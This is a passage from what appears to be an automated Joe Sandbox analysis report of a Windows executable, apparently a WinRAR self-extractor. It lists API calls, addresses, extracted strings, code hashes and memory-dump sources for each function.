                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID: 0d
                                                                                                                    • API String ID: 776569668-2809447700
                                                                                                                    • Opcode ID: 2ba7dcf9f9ca8bed24f7e2f62b19a2a0681356868fb30957bd9f66fcea69c06b
                                                                                                                    • Instruction ID: 94d581e4242e84146f74f4435e9d2660cd8f655ae551d363858ecd8554ddf2b5
                                                                                                                    • Opcode Fuzzy Hash: 2ba7dcf9f9ca8bed24f7e2f62b19a2a0681356868fb30957bd9f66fcea69c06b
                                                                                                                    • Instruction Fuzzy Hash: 8F11937611010DAFCB01EF54CA42CD93BF9EF14351B5168A1FF08AF262DE32DA589B84
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00E49736
                                                                                                                    • _wcslen.LIBCMT ref: 00E497D6
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00E497E5
                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00E49806
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E4982D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                    • String ID: Fjun$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                    • API String ID: 1777411235-1684715023
                                                                                                                    • Opcode ID: 2d38d9cff2c2e2f56de926031b4eb7adcb9489550850f7bbb3851156d88ecbd4
                                                                                                                    • Instruction ID: 80c3a5b6dbbf0f1dd5bd46d187769ad66a818a1a8d03f481d19922cb0585b1ff
                                                                                                                    • Opcode Fuzzy Hash: 2d38d9cff2c2e2f56de926031b4eb7adcb9489550850f7bbb3851156d88ecbd4
                                                                                                                    • Instruction Fuzzy Hash: B8314A325083017ED725AF34BC06F6F77D89F42361F14251EF901B61D3EB649A0883A6
                                                                                                                    APIs
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00E4D6C1
                                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 00E4D6ED
                                                                                                                      • Part of subcall function 00E41FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E3C116,00000000,.exe,?,?,00000800,?,?,?,00E48E3C), ref: 00E41FD1
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00E4D709
                                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00E4D720
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00E4D734
                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00E4D75D
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00E4D764
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00E4D76D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                    • String ID: STATIC
                                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                                    • Opcode ID: 5ba89eccb80c9e65f3911bd1bb500bf581cee8abdc8900ac3d5d5a4c4532abc8
                                                                                                                    • Instruction ID: 0ea8a1606024acb7944643227ac4eabedc64c12324d2db4f9229d440ecca7b79
                                                                                                                    • Opcode Fuzzy Hash: 5ba89eccb80c9e65f3911bd1bb500bf581cee8abdc8900ac3d5d5a4c4532abc8
                                                                                                                    • Instruction Fuzzy Hash: 3C1133726493107FE6206B71BC4EFAF769CAF44721F006123FA01F20E1DA648F0942A5
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                    • String ID: csm$csm$csm
                                                                                                                    • API String ID: 322700389-393685449
                                                                                                                    • Opcode ID: b2a8fc92034ceeb4c60bb3bfd0bd473aef7efc1cfc3473a4ab4085cc3e6b9450
                                                                                                                    • Instruction ID: d535ed390f2d408fd448081018e097ad03939ec447f273f56a01af55c4377a86
                                                                                                                    • Opcode Fuzzy Hash: b2a8fc92034ceeb4c60bb3bfd0bd473aef7efc1cfc3473a4ab4085cc3e6b9450
                                                                                                                    • Instruction Fuzzy Hash: 07B19731900209EFCF29DFB4D9818AEBBB5BF05356F14695AED017B212C731DA19CBA1
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n
                                                                                                                    • API String ID: 3519838083-140586453
                                                                                                                    • Opcode ID: 97d6fb04e715f408ff846d2cf75135b473ee30062e86c5524238565bfe98e012
                                                                                                                    • Instruction ID: 9c6fcd2e1a7d294e0e1687f2abe25581deee613781471913bc110b21fcaa104f
                                                                                                                    • Opcode Fuzzy Hash: 97d6fb04e715f408ff846d2cf75135b473ee30062e86c5524238565bfe98e012
                                                                                                                    • Instruction Fuzzy Hash: 11716C71A00219EFDB18DFA5D8999AFBBB9FF88354F041169E512B72A0CB30AD45CB50
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E36FAA
                                                                                                                    • _wcslen.LIBCMT ref: 00E37013
                                                                                                                    • _wcslen.LIBCMT ref: 00E37084
                                                                                                                      • Part of subcall function 00E37A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E37AAB
                                                                                                                      • Part of subcall function 00E37A9C: GetLastError.KERNEL32 ref: 00E37AF1
                                                                                                                      • Part of subcall function 00E37A9C: CloseHandle.KERNEL32(?), ref: 00E37B00
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                    • API String ID: 3122303884-3508440684
                                                                                                                    • Opcode ID: f2d4468960d83aef6d8dce8a0583c01c0faced0411496bad70476fa30d8f5f88
                                                                                                                    • Instruction ID: 66862df093529aa87bbde3e685f8a75fef7d2f1ab4ec7167e5808b610464fdfe
                                                                                                                    • Opcode Fuzzy Hash: f2d4468960d83aef6d8dce8a0583c01c0faced0411496bad70476fa30d8f5f88
                                                                                                                    • Instruction Fuzzy Hash: A741C6F1D08344BAEB30E7749C4AFEE7BAC9F44344F046455FA85B7182D674AA88CB21
APIs
  • Part of subcall function 00E31316: GetDlgItem.USER32(00000000,00003021), ref: 00E3135A
  • Part of subcall function 00E31316: SetWindowTextW.USER32(00000000,00E635F4), ref: 00E31370
• EndDialog.USER32(?,00000001), ref: 00E4B610
• SendMessageW.USER32(?,00000080,00000001,?), ref: 00E4B637
• SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00E4B650
• SetWindowTextW.USER32(?,?), ref: 00E4B661
• GetDlgItem.USER32(?,00000065), ref: 00E4B66A
• SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00E4B67E
• SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00E4B694
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: MessageSend$Item$TextWindow$Dialog
• String ID: LICENSEDLG
• API String ID: 3214253823-2177901306
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,B0BD95E7,00000001,00000000,00000000,?,?,00E3AF6C,ROOT\CIMV2), ref: 00E4FD99
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00E3AF6C,ROOT\CIMV2), ref: 00E4FE14
• SysAllocString.OLEAUT32(00000000), ref: 00E4FE1F
• _com_issue_error.COMSUPP ref: 00E4FE48
• _com_issue_error.COMSUPP ref: 00E4FE52
• GetLastError.KERNEL32(80070057,B0BD95E7,00000001,00000000,00000000,?,?,00E3AF6C,ROOT\CIMV2), ref: 00E4FE57
• _com_issue_error.COMSUPP ref: 00E4FE6A
• GetLastError.KERNEL32(00000000,?,?,00E3AF6C,ROOT\CIMV2), ref: 00E4FE80
• _com_issue_error.COMSUPP ref: 00E4FE93
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
• String ID:
• API String ID: 1353541977-0
APIs
• __EH_prolog.LIBCMT ref: 00E39387
• GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00E393AA
• GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00E393C9
  • Part of subcall function 00E3C29A: _wcslen.LIBCMT ref: 00E3C2A2
  • Part of subcall function 00E41FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E3C116,00000000,.exe,?,?,00000800,?,?,?,00E48E3C), ref: 00E41FD1
• _swprintf.LIBCMT ref: 00E39465
  • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
• MoveFileW.KERNEL32(?,?), ref: 00E394D4
• MoveFileW.KERNEL32(?,?), ref: 00E39514
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
• String ID: rtmp%d
• API String ID: 3726343395-3303766350
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: _wcslen
• String ID: U$p$z
• API String ID: 176396367-3999876168
APIs
• ShowWindow.USER32(?,00000000), ref: 00E49EEE
• GetWindowRect.USER32(?,00000000), ref: 00E49F44
• ShowWindow.USER32(?,00000005,00000000), ref: 00E49FDB
• SetWindowTextW.USER32(?,00000000), ref: 00E49FE3
• ShowWindow.USER32(00000000,00000005), ref: 00E49FF9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: Window$Show$RectText
• String ID: $RarHtmlClassName
• API String ID: 3937224194-266247588
APIs
• __aulldiv.LIBCMT ref: 00E4122E
  • Part of subcall function 00E3B146: GetVersionExW.KERNEL32(?), ref: 00E3B16B
• FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00E41251
• FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00E41263
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00E41274
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00E41284
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00E41294
• FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00E412CF
• __aullrem.LIBCMT ref: 00E41379
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
• String ID:
• API String ID: 1247370737-0
APIs
• _swprintf.LIBCMT ref: 00E32536
  • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
  • Part of subcall function 00E405DA: _wcslen.LIBCMT ref: 00E405E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: __vswprintf_c_l_swprintf_wcslen
• String ID: ;%u$x%u$xc%u
• API String ID: 3053425827-2277559157
                                                                                                                    APIs
                                                                                                                    Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: _wcslen
• String ID: </p>$</style>$<br>$<style>$>
• API String ID: 176396367-3568243669
• Opcode ID: d9bede0c564889dc6ca0b49f07770dfb403496b4cc7acb611af79de620d26a09
• Instruction ID: 1a6911425c32343048882cab56ddaebf6a7b8c6ed8c41340bb5b8710578ab26d
• Opcode Fuzzy Hash: d9bede0c564889dc6ca0b49f07770dfb403496b4cc7acb611af79de620d26a09
• Instruction Fuzzy Hash: 37512A66B4032395DB309E65BC11B7773E0DFA1794F69242AFDC1BB1C2FB658C818261
APIs
• GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00E5FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00E5F6CF
• __fassign.LIBCMT ref: 00E5F74A
• __fassign.LIBCMT ref: 00E5F765
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00E5F78B
• WriteFile.KERNEL32(?,00000000,00000000,00E5FE02,00000000,?,?,?,?,?,?,?,?,?,00E5FE02,00000000), ref: 00E5F7AA
• WriteFile.KERNEL32(?,00000000,00000001,00E5FE02,00000000,?,?,?,?,?,?,?,?,?,00E5FE02,00000000), ref: 00E5F7E3
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: d6bcab5bb89e855f0b21b54ea5ef3894c89eab0c712564d2811eafd1948199f0
• Instruction ID: 6833babec0a85a8c5ac7fc888e5d65406f1024a2520e9587b2370a845c84f3ba
• Opcode Fuzzy Hash: d6bcab5bb89e855f0b21b54ea5ef3894c89eab0c712564d2811eafd1948199f0
• Instruction Fuzzy Hash: EC51C7B5D00209AFCB14CFA8DC45AEEBBF4EF09301F14556AE955F7251D770AA48CBA0
APIs
• GetTempPathW.KERNEL32(00000800,?), ref: 00E4CE9D
  • Part of subcall function 00E3B690: _wcslen.LIBCMT ref: 00E3B696
• _swprintf.LIBCMT ref: 00E4CED1
  • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
• SetDlgItemTextW.USER32(?,00000066,00E7946A), ref: 00E4CEF1
• _wcschr.LIBVCRUNTIME ref: 00E4CF22
• EndDialog.USER32(?,00000001), ref: 00E4CFFE
Strings
Similarity
• API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
• String ID: %s%s%u
• API String ID: 689974011-1360425832
• Opcode ID: 456a9d3197ac43befe1f04ee36de7cefdf0c40c1e6fcd1bc6e2bcea9311825e5
• Instruction ID: a60d45a9c4185a84782d68cb97c08afc4fda9fc93800bed7616b37c64dc6a743
• Opcode Fuzzy Hash: 456a9d3197ac43befe1f04ee36de7cefdf0c40c1e6fcd1bc6e2bcea9311825e5
• Instruction Fuzzy Hash: 534170B1900258AADF21DB60EC45AEE77FCEB05344F5090A6FA09F7051EA749A88CF61
APIs
• _ValidateLocalCookies.LIBCMT ref: 00E52937
• ___except_validate_context_record.LIBVCRUNTIME ref: 00E5293F
• _ValidateLocalCookies.LIBCMT ref: 00E529C8
• __IsNonwritableInCurrentImage.LIBCMT ref: 00E529F3
• _ValidateLocalCookies.LIBCMT ref: 00E52A48
Strings
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 39d0344bd86f6c01c953b9147e825f71660b75a4bcd80d3b53b467e682987be0
• Instruction ID: 248b05d5cd0b7a34c3bf99abc504becba39b4a1fab2bf19a6b1fb1615cd90429
• Opcode Fuzzy Hash: 39d0344bd86f6c01c953b9147e825f71660b75a4bcd80d3b53b467e682987be0
• Instruction Fuzzy Hash: DD41F534A00208AFCF10DF68C880A9E7BF0AF46369F149959EE157B392C771DA09CF90
APIs
Strings
Similarity
• API ID: _wcslen
• String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
• API String ID: 176396367-3743748572
• Opcode ID: 57a23ed6e6246f4ad8c79e0c23593c69dca4699a15416224a7170e779af65b55
• Instruction ID: 68260e9dd34224ed6a832e0bd7feb9d4116b16c3e98d1772be2884c725ed6855
• Opcode Fuzzy Hash: 57a23ed6e6246f4ad8c79e0c23593c69dca4699a15416224a7170e779af65b55
• Instruction Fuzzy Hash: E6317D726443455ADA30AF94BC42B7B73E4EB90364F50581FF986772C2FB60AD8893A1
APIs
• GetDC.USER32(00000000), ref: 00E4AAD2
• GetObjectW.GDI32(?,00000018,?), ref: 00E4AB01
• ReleaseDC.USER32(00000000,?), ref: 00E4AB99
Strings
Similarity
• API ID: ObjectRelease
• String ID: -$7$
• API String ID: 1429681911-575736043
• Opcode ID: 16165c50cd15777385eff388e1c12618b39e5047f0846fdca68c4f32886b7627
• Instruction ID: 56d35c632445564560fdffacbced3b59cc1ef20ec22c5f09401026ec567dd860
• Opcode Fuzzy Hash: 16165c50cd15777385eff388e1c12618b39e5047f0846fdca68c4f32886b7627
• Instruction Fuzzy Hash: 6321FA76108304AFD3019FA6DC48E6FBFE9FB89355F04092BFA45A2120D7319A589B62
APIs
  • Part of subcall function 00E5C868: _free.LIBCMT ref: 00E5C891
• _free.LIBCMT ref: 00E5C8F2
  • Part of subcall function 00E58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?), ref: 00E58DE2
  • Part of subcall function 00E58DCC: GetLastError.KERNEL32(?,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?,?), ref: 00E58DF4
• _free.LIBCMT ref: 00E5C8FD
• _free.LIBCMT ref: 00E5C908
• _free.LIBCMT ref: 00E5C95C
• _free.LIBCMT ref: 00E5C967
• _free.LIBCMT ref: 00E5C972
• _free.LIBCMT ref: 00E5C97D
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
• Instruction ID: 228e8bc0ab258a105745389cfa67b04acb8dffed4a8d6497fbc22aaca3bbce4e
• Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
• Instruction Fuzzy Hash: 79114F71580B08AAE620B7B1DC07FCB7BEC9F10B02F501C15FB9D76092DA65B54D8750
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00E4E669,00E4E5CC,00E4E86D), ref: 00E4E605
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00E4E61B
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00E4E630
Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
